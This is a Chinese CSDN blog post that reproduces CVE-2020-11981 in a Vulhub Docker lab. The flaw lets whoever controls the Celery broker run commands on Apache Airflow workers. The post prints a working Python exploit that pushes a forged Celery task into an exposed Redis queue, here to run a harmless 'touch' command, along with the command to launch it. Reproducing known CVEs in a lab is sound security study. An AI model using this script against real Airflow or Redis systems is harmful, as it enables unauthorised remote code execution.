Apache Airflow Celery Broker 远程命令执行 (CVE-2020-11981)漏洞复现

最新推荐文章于 2024-05-22 15:57:48 发布
最新推荐文章于 2024-05-22 15:57:48 发布
阅读量217 收藏
点赞数
文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56537388/article/details/134285633
版权
本文详细描述了ApacheAirflow1.10.10之前版本中的Redis控制漏洞,攻击者可通过已控制的Celery代理在工作进程中执行任意命令,涉及搭建Docker环境、利用脚本和Vulhub示例。
摘要由CSDN通过智能技术生成

漏洞描述

Apache Airflow 是一个开源的分布式任务调度框架。在 1.10.10 之前的版本中,如果 Redis 代理(如 Redis 或 RabbitMQ)已被攻击者控制,则攻击者可以在工作进程中执行任意命令。

漏洞环境及利用

搭建docker环境

要利用此漏洞,您必须获得 Celery 代理 Redis 的写入权限。在 Vulhub 环境中,Redis 端口 6379 在 Internet 上暴露。

通过 Redis,您可以将邪恶任务添加到队列中以执行任意命令

py脚本内容

import pickle
import json
import base64
import redis
import sys
r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0) 
queue_name = 'default'
ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"W1sxMDAsIDIwMF0sIHt9LCB7ImNoYWluIjogbnVsbCwgImNob3JkIjogbnVsbCwgImVycmJhY2tzIjogbnVsbCwgImNhbGxiYWNrcyI6IG51bGx9XQ==\"}"
task_dict = json.loads(ori_str)
command = ['touch', '/tmp/airflow_celery_success']
body=[[command], {}, {"chain": None, "chord": None, "errbacks": None, "callbacks": None}]
task_dict['body']=base64.b64encode(json.dumps(body).encode()).decode()
print(task_dict)
r.lpush(queue_name,json.dumps(task_dict))

运行py脚本

python3 exploit_airflow_celery.py 192.168.232.128

查看运行结果

sudo docker-compose exec airflow-worker ls -l /tmp 

 

blackK_YC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本
12-09
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来管理任务流程的任务调度工具, 不需要知道业务数据的具体内容,设置任务的依赖关系即可实现任务调度。 这个平台拥有和 Hive、Presto、MySQL、HDFS、Postgres 等数据源之间交互的能力,并且提供了钩子(hook)使其拥有很好地扩展性。除了一个命令行界面,该工具还提供了一个基于 Web 的用户界面可以可视化管道的依赖关系、监控进度、触发任务等。 Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令
CVE-2020-11981 Apache Airflow Celery 消息中间件命令执行漏洞复现
ierciyuan的博客
08-04 1815
CVE-2020-11981 Apache Airflow Celery 消息中间件命令执行漏洞复现。poc。
Apache Airflow Celery 消息中间件命令执行(CVE-2020-11981)
weixin_44047654的博客
11-28 1148
Apache Airflow Celery 消息中间件命令执行(CVE-2020-11981)
Apache Airflow Celery 消息中间件命令执行漏洞复现CVE-2020-11981
Tauil的博客
08-14 1781
利用AirflowCeleryExecutor类来进行命令执行,可利用版本小于1.10.10。到airflowcelery redis队列。写入一个JSON任务消息执行。然后另起一个终端,输入。,回到原终端执行命令。,即可连接到目标靶机。...
漏洞复现----49、Apache Airflow 身份验证绕过 (CVE-2020-17526)
七天
07-06 2797
Apache Airflow 身份验证绕过 (CVE-2020-17526)
vulhub中 Apache Airflow Celery 消息中间件命令执行漏洞复现CVE-2020-11981
yougexiaojiuguan的博客
02-03 282
漏洞复现过程中的记录,方便自己以后查看。
Python库 | apache-airflow-providers-apache-spark-2.1.3.tar.gz
04-06
资源分类:Python库 所属语言:Python 资源全名:apache-airflow-providers-apache-spark-2.1.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
airflow-code-editor:Apache Airflow的插件,可让您在浏览器中编辑DAG
04-27
气流代码编辑器插件 ... git_cmd git命令(可选路径) git_default_args git参数添加到每个调用中(默认值:-c color.ui = true) git_author_name作者/提交者中易于理解的名称(默认记录的用户的名字和姓
PyPI 官网下载 | apache-airflow-providers-apache-hive-1.0.0b2.tar.gz
01-31
标题中的"PyPI 官网下载 | apache-airflow-providers-apache-hive-1.0.0b2.tar.gz"表明这是一个从Python Package Index (PyPI)官方源下载的软件包,具体是Apache Airflow的一个提供者包,用于与Apache Hive进行集成...
airflow-client-go:Apache Airflow-Go的OpenApi客户端
05-17
"github.com/apache/airflow-client-go/airflow" ) func main () { cli := airflow . NewAPIClient ( & airflow. Configuration { Scheme : "http" , Host : "localhost:8080" , BasePath : "/api/v1" , })...
CVE-2022-24288:Apache Airflow OS命令注入漏洞复现
热爱学习,喜欢折腾!
08-24 1951
Apache Airflow 2.2.4 之前的版本中,一些示例 DAG 没有正确清理用户提供的参数,使其容易受到来自 Web UI 的 OS 命令注入的影响。Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。............
漏洞复现——Apache Airflow 示例dag中的命令注入(CVE-2020-11978)
m0_65149086的博客
05-26 440
懵逼日常
Apache Airflow 示例dag中的命令注入(CVE-2020-11978)
weixin_44047654的博客
11-29 784
Apache Airflow 示例dag中的命令注入(CVE-2020-11978)
[ vulhub漏洞复现篇 ] Apache Airflow Celery 消息中间件命令执行漏洞复现 CVE-2020-11981
qq_51577576的博客
12-18 605
[ vulhub漏洞复现篇 ] Apache Airflow Celery 消息中间件命令执行漏洞复现 CVE-2020-11981 Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令
Vulhub——Airflow
最新发布
qq_55202378的博客
05-22 493
Apache Airflow是一款开源的,分布式任务调度框架。,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令。成功绕过登录检测,但是此时cookie值发生了改变,就是不是我们生成的那个cookie了。中存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker中执行任意命令。,即使开启了认证,攻击者也可以通过一个默认密钥来绕过登录,伪造任意用户。来执行任意命令,参数为命令执行中所需要的数组。这个小脚本来执行命令
CVE-2020-11978)Airflow dag中的命令注入漏洞复现【vulhub靶场】
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
06-18 3308
Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker中执行任意命令。基于vulhub靶场的CVE-2020-11978漏洞复现airflow dag中的命令注入RCE和反弹shell教学。漏洞复现。......
Celery Redis未授权访问命令执行利用
fnmsd的博客
07-10 7313
Celery在队列中间件未授权的情况下命令执行的利用。
Apache Unomi 远程代码执行漏洞CVE-2020-13942)复现
玄道的网安博客
01-21 668
漏洞描述 Apache Unomi是一个Java开源客户数据平台,这是一个Java服务器,旨在管理客户,潜在顾客和访问者的数据,并帮助个性化客户体验。Unomi可用于在非常不同的系统(例如CMS,CRM,问题跟踪器,本机移动应用程序等)中集成个性化和配置文件管理。 Apache Unomi允许远程攻击者使用可能包含任意类的MVEL和OGNL表达式发送恶意请求,从而产生具有Unomi应用程序特权的远程代码执行(RCE)。目前互联网上已经公布漏洞利用相关POC,建议相关用户及时进行资产自查。 影响..
【vulhub】搭建与问题记录
weixin_49422491的博客
04-29 1235
参考链接 解决: 下载好之后,每次启动一个靶场的时候都需先进去相应的目录,然后2.1 启动docker 2.2、 docker依赖启动 2.3、 关闭环境 用完之后记得在对应目录使用这个关闭命令关闭环境,我以为把,云搭建的如果不关的话,会被学安全的小伙伴玩坏的~哈哈哈哈,我害怕。也不知道关了会不会安全些,但养成好习惯,用完就关掉总是好的。 二、本地Ubuntu虚拟机搭建vulhub 依旧是搜了一下别人怎么搭建的。然后,跟着这个博客搭建了vulhub。然后我问我朋友要怎么访问,他说“172.18.1.0:
CVE-2020-11978
08-10
回答:CVE-2020-11978是Apache Airflow中的一个命令注入漏洞。根据引用中提到的博文,漏洞可以通过复现来进行验证。要进行复现,可以使用vulhub靶场中的CVE-2020-11978文件夹,并按照指示输入相关命令启动docker-compose来搭建环境。需要注意的是,由于技术文章具有时效性,建议查看文章出处以获取最新版本的信息。123 #### 引用[.reference_title] - *1* *2* *3* [(CVE-2020-11978)Airflow dag中的命令注入漏洞复现【vulhub靶场】](https://blog.csdn.net/weixin_43847838/article/details/125349343)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值